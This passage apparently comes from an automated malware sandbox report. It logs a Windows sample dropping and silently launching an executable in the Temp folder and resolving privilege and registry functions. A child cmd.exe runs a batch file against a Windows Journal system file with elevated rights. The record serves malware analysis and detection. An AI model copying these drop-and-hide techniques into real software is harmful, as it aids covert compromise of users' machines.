| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0xe00, show_window = SW_HIDE |
|
1 |
Module (164)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:40 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #224: cmd.exe
71
0
| Information | Value |
|---|---|
| ID | #224 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:29, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdfc |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C74
0x
E8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000130000 | 0x00130000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x0013ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00143fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00151fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00153fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00173fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00490000 | 0x0054dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e440000 | 0x7e440000 | 0x7e53ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e540000 | 0x7e540000 | 0x7e562fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e567000 | 0x7e567000 | 0x7e567fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e569000 | 0x7e569000 | 0x7e56bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e56c000 | 0x7e56c000 | 0x7e56efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e56f000 | 0x7e56f000 | 0x7e56ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (30)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
